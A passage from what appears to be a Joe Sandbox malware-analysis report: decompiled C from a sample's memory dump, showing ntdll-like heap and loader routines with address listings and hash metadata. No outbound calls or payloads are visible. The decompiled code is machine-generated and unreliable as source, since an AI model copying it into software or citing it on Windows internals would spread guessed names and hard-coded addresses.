												E017A37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x1857b10 =  *0x1857b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x1857b04 =  *0x1857b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L017877F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L017877F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x1857b08 =  *0x1857b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E017A57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E017AF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L017877F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0179A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L017877F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E017A96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                                              0x0177849b
                                                                              0x0177849b
                                                                              0x0177849b
                                                                              0x0177849b
                                                                              0x0177849d
                                                                              0x017784a2
                                                                              0x017784a7
                                                                              0x017784b1
                                                                              0x017784d8
                                                                              0x00000000
                                                                              0x017784b3
                                                                              0x017784c4
                                                                              0x017784c9
                                                                              0x017784cd
                                                                              0x017784cf
                                                                              0x017784cf
                                                                              0x017784d6
                                                                              0x017784e6
                                                                              0x017784e9
                                                                              0x017784ec
                                                                              0x017784ef
                                                                              0x017784f2
                                                                              0x017784f4
                                                                              0x017784fc
                                                                              0x01778501
                                                                              0x01778506
                                                                              0x01778509
                                                                              0x017786e0
                                                                              0x017786e5
                                                                              0x017786e8
                                                                              0x017786ed
                                                                              0x017786f0
                                                                              0x017786f2
                                                                              0x017c9afd
                                                                              0x017c9b02
                                                                              0x017784da
                                                                              0x017784df
                                                                              0x017784df
                                                                              0x017786fa
                                                                              0x017786fd
                                                                              0x017786fe
                                                                              0x01778701
                                                                              0x01778706
                                                                              0x01778709
                                                                              0x0177870b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01778711
                                                                              0x01778725
                                                                              0x01778727
                                                                              0x0177872a
                                                                              0x0177872c
                                                                              0x017c9af0
                                                                              0x017c9af5
                                                                              0x01778732
                                                                              0x01778732
                                                                              0x01778732
                                                                              0x01778735
                                                                              0x01778737
                                                                              0x01778515
                                                                              0x01778515
                                                                              0x01778518
                                                                              0x0177851d
                                                                              0x01778523
                                                                              0x01778527
                                                                              0x0177852b
                                                                              0x01778537
                                                                              0x01778539
                                                                              0x0177853c
                                                                              0x0177853e
                                                                              0x0177868c
                                                                              0x01778691
                                                                              0x01778699
                                                                              0x0177869b
                                                                              0x01778744
                                                                              0x01778748
                                                                              0x017786a1
                                                                              0x017786a1
                                                                              0x017786a1
                                                                              0x017786a4
                                                                              0x017786a8
                                                                              0x017c9bdf
                                                                              0x017c9bdf
                                                                              0x017786ae
                                                                              0x017786b0
                                                                              0x00000000
                                                                              0x017786b6
                                                                              0x00000000
                                                                              0x017c9be9
                                                                              0x017786b0
                                                                              0x01778544
                                                                              0x0177854a
                                                                              0x0177854d
                                                                              0x01778551
                                                                              0x0177876e
                                                                              0x01778778
                                                                              0x0177877b
                                                                              0x01778780
                                                                              0x01778557
                                                                              0x01778557
                                                                              0x0177855d
                                                                              0x0177855d
                                                                              0x0177856b
                                                                              0x0177856e
                                                                              0x01778570
                                                                              0x01778573
                                                                              0x01778576
                                                                              0x01778576
                                                                              0x01778579
                                                                              0x0177857b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01778581
                                                                              0x017785a0
                                                                              0x017785a2
                                                                              0x017785a5
                                                                              0x017785a7
                                                                              0x017c9b1b
                                                                              0x017c9b1b
                                                                              0x0177862e
                                                                              0x0177862e
                                                                              0x01778631
                                                                              0x01778631
                                                                              0x01778634
                                                                              0x01778636
                                                                              0x01778669
                                                                              0x01778669
                                                                              0x0177866b
                                                                              0x017c9bbf
                                                                              0x017c9bc4
                                                                              0x017c9bc8
                                                                              0x017c9bce
                                                                              0x017c9bce
                                                                              0x01778671
                                                                              0x01778671
                                                                              0x01778674
                                                                              0x01778676
                                                                              0x017c9bae
                                                                              0x017c9bae
                                                                              0x01778676
                                                                              0x0177867c
                                                                              0x0177867e
                                                                              0x01778688
                                                                              0x01778688
                                                                              0x00000000
                                                                              0x0177867e
                                                                              0x01778638
                                                                              0x01778638
                                                                              0x0177863b
                                                                              0x0177863e
                                                                              0x0177863f
                                                                              0x01778642
                                                                              0x01778645
                                                                              0x01778648
                                                                              0x0177864d
                                                                              0x017c9b69
                                                                              0x017c9b6e
                                                                              0x017c9b7b
                                                                              0x017c9b81
                                                                              0x017c9b85
                                                                              0x017c9b89
                                                                              0x017c9ba7
                                                                              0x017c9b8b
                                                                              0x017c9b91
                                                                              0x017c9b9a
                                                                              0x017c9b9f
                                                                              0x017c9b9f
                                                                              0x01778788
                                                                              0x0177878d
                                                                              0x01778763
                                                                              0x01778763
                                                                              0x01778766
                                                                              0x00000000
                                                                              0x01778766
                                                                              0x017c9b70
                                                                              0x00000000
                                                                              0x017c9b70
                                                                              0x01778656
                                                                              0x0177865a
                                                                              0x0177865c
                                                                              0x01778752
                                                                              0x01778756
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0177875e
                                                                              0x00000000
                                                                              0x0177875e
                                                                              0x01778662
                                                                              0x01778662
                                                                              0x01778662
                                                                              0x01778666
                                                                              0x00000000
                                                                              0x01778666
                                                                              0x017785b7
                                                                              0x017785b9
                                                                              0x017785bc
                                                                              0x017785bf
                                                                              0x017785cc
                                                                              0x017785d1
                                                                              0x017785d4
                                                                              0x017785db
                                                                              0x017785de
                                                                              0x017785e0
                                                                              0x017c9b5f
                                                                              0x00000000
                                                                              0x017c9b5f
                                                                              0x017785e6
                                                                              0x017785ea
                                                                              0x017786c3
                                                                              0x017786c5
                                                                              0x017786c8
                                                                              0x017786ca
                                                                              0x017c9b16
                                                                              0x00000000
                                                                              0x017c9b16
                                                                              0x017786d6
                                                                              0x017785f6
                                                                              0x017785f6
                                                                              0x017785f9
                                                                              0x01778602
                                                                              0x01778606
                                                                              0x0177860a
                                                                              0x0177860b
                                                                              0x0177860e
                                                                              0x01778611
                                                                              0x00000000
                                                                              0x01778611
                                                                              0x017785f3
                                                                              0x00000000
                                                                              0x017785f3
                                                                              0x01778619
                                                                              0x0177861e
                                                                              0x0177861e
                                                                              0x01778621
                                                                              0x01778622
                                                                              0x01778623
                                                                              0x01778625
                                                                              0x0177862c
                                                                              0x00000000
                                                                              0x0177873d
                                                                              0x00000000
                                                                              0x0177873d
                                                                              0x01778737
                                                                              0x0177850f
                                                                              0x01778512
                                                                              0x00000000
                                                                              0x01778512
                                                                              0x00000000
                                                                              0x017784d6

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1352c07b15e2cae6037588f9e12c082cb25b1bf5bf3527212bf592eea72da827
                                                                              • Instruction ID: 0d2111c63d09f281af9368b136a48a4d9a4c2d8ac16c3817efbabbf21dffd807
                                                                              • Opcode Fuzzy Hash: 1352c07b15e2cae6037588f9e12c082cb25b1bf5bf3527212bf592eea72da827
                                                                              • Instruction Fuzzy Hash: 2DB14B70E00209EFDF25DFA9C988AADFBB5FF48704F10412EE505AB246D774A945CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0179513A Relevance: .3, Instructions: 258COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 67%
                                                                              			E0179513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x185d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E017AD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E01782280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L01784620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E017AF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0177FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x185b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E017AB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                                              0x01795142
                                                                              0x0179514c
                                                                              0x01795150
                                                                              0x01795157
                                                                              0x01795159
                                                                              0x0179515e
                                                                              0x01795165
                                                                              0x01795169
                                                                              0x0179516c
                                                                              0x01795172
                                                                              0x01795176
                                                                              0x0179517a
                                                                              0x0179517a
                                                                              0x0179517a
                                                                              0x0179517f
                                                                              0x017d6d8b
                                                                              0x017d6d8e
                                                                              0x017d6d91
                                                                              0x017d6d95
                                                                              0x017d6d98
                                                                              0x017d6d9c
                                                                              0x017d6da0
                                                                              0x017d6da3
                                                                              0x017d6da7
                                                                              0x017d6e26
                                                                              0x017d6e26
                                                                              0x017d6e2a
                                                                              0x017951f9
                                                                              0x017951f9
                                                                              0x017951fe
                                                                              0x017d6e33
                                                                              0x017d6e33
                                                                              0x017d6e39
                                                                              0x017d6e3d
                                                                              0x017d6e46
                                                                              0x017d6e50
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d6e52
                                                                              0x017d6e53
                                                                              0x017d6e56
                                                                              0x017d6e5d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d6e5f
                                                                              0x017d6e67
                                                                              0x017d6e77
                                                                              0x017d6e7f
                                                                              0x017d6e80
                                                                              0x017d6e88
                                                                              0x017d6e90
                                                                              0x017d6e9f
                                                                              0x017d6ea5
                                                                              0x017d6ea9
                                                                              0x017d6eb1
                                                                              0x017d6ebf
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d6ecf
                                                                              0x017d6ed3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d6edb
                                                                              0x017d6ede
                                                                              0x017d6ee1
                                                                              0x017d6ee8
                                                                              0x017d6eeb
                                                                              0x017d6eed
                                                                              0x017d6ef0
                                                                              0x017d6ef4
                                                                              0x017d6ef8
                                                                              0x017d6efc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d6f0d
                                                                              0x017d6f11
                                                                              0x017d6f32
                                                                              0x017d6f37
                                                                              0x017d6f3b
                                                                              0x017d6f3e
                                                                              0x017d6f41
                                                                              0x017d6f46
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d6f4c
                                                                              0x017d6f50
                                                                              0x017d6f50
                                                                              0x017d6f54
                                                                              0x017d6f62
                                                                              0x017d6f65
                                                                              0x017d6f6d
                                                                              0x017d6f7b
                                                                              0x017d6f7b
                                                                              0x017d6f93
                                                                              0x017d6f98
                                                                              0x017d6fa0
                                                                              0x017d6fa6
                                                                              0x017d6fb3
                                                                              0x017d6fb6
                                                                              0x017d6fbf
                                                                              0x017d6fc1
                                                                              0x017d6fd5
                                                                              0x017d6fda
                                                                              0x017d6fda
                                                                              0x017d6fdd
                                                                              0x017d6fe2
                                                                              0x017d6fe7
                                                                              0x017d6feb
                                                                              0x017d6fef
                                                                              0x017d6ff3
                                                                              0x0179520c
                                                                              0x0179520c
                                                                              0x0179520f
                                                                              0x01795215
                                                                              0x01795234
                                                                              0x0179523a
                                                                              0x0179523a
                                                                              0x01795244
                                                                              0x01795245
                                                                              0x01795246
                                                                              0x01795251
                                                                              0x01795251
                                                                              0x017d6f13
                                                                              0x017d6f17
                                                                              0x017d6f17
                                                                              0x017d6f18
                                                                              0x017d6f1b
                                                                              0x017d6f1f
                                                                              0x017d6f23
                                                                              0x00000000
                                                                              0x017d6f28
                                                                              0x01795204
                                                                              0x01795204
                                                                              0x01795208
                                                                              0x00000000
                                                                              0x01795208
                                                                              0x01795185
                                                                              0x01795188
                                                                              0x0179518a
                                                                              0x0179518e
                                                                              0x01795195
                                                                              0x017d6db1
                                                                              0x017d6db5
                                                                              0x017d6db9
                                                                              0x0179519b
                                                                              0x0179519b
                                                                              0x0179519e
                                                                              0x017951a7
                                                                              0x017951a9
                                                                              0x017951a9
                                                                              0x017951b5
                                                                              0x017951b8
                                                                              0x017951bb
                                                                              0x017951be
                                                                              0x017951c1
                                                                              0x017951c5
                                                                              0x017951c9
                                                                              0x017951cd
                                                                              0x017951cd
                                                                              0x017951d8
                                                                              0x017951dc
                                                                              0x017951e0
                                                                              0x017d6dcc
                                                                              0x017d6dd0
                                                                              0x017d6dd5
                                                                              0x017d6ddd
                                                                              0x017d6de1
                                                                              0x017d6de1
                                                                              0x017d6de5
                                                                              0x017d6deb
                                                                              0x017d6df1
                                                                              0x017d6df7
                                                                              0x017d6dfd
                                                                              0x017d6e01
                                                                              0x017d6e05
                                                                              0x017d6e09
                                                                              0x017d6e0d
                                                                              0x017d6e11
                                                                              0x017d6e11
                                                                              0x017951eb
                                                                              0x017d6e1a
                                                                              0x017d6e1f
                                                                              0x017d6e21
                                                                              0x017d6e23
                                                                              0x00000000
                                                                              0x017951f1
                                                                              0x017951f1
                                                                              0x00000000
                                                                              0x017951f1

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 18f204b71c2931ec8a5d7cecf39cfac8c4f175ade8e021cc7e25c1854a39dbe3
                                                                              • Instruction ID: 25174f252a9f26661306254d2ec2bdb337510623b0b1df7c757e6118ab7e260c
                                                                              • Opcode Fuzzy Hash: 18f204b71c2931ec8a5d7cecf39cfac8c4f175ade8e021cc7e25c1854a39dbe3
                                                                              • Instruction Fuzzy Hash: CAC124B55083818FD755CF28C580A5AFBF1BF88304F144AAEF9998B352D771E985CB42
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017903E2 Relevance: .3, Instructions: 254COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 74%
                                                                              			E017903E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x185d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E01790548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E017AB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0177B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1857c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E01787D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E01787D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E017E7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E017A9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E017E69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1857c04 != 0) {
						_t118 = _v12;
						_t120 = E017EA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1857bd8;
						if( *0x1857bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E017A95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E017A99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E017E3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0176B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E017AAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1858474 - 3;
										if( *0x1858474 != 3) {
											 *0x18579dc =  *0x18579dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E01787D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E01787D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E017E7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x1858708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1857b00; // 0x0
							asm("ror esi, cl");
							 *0x185b1e0(_v12, _v20, 0x20);
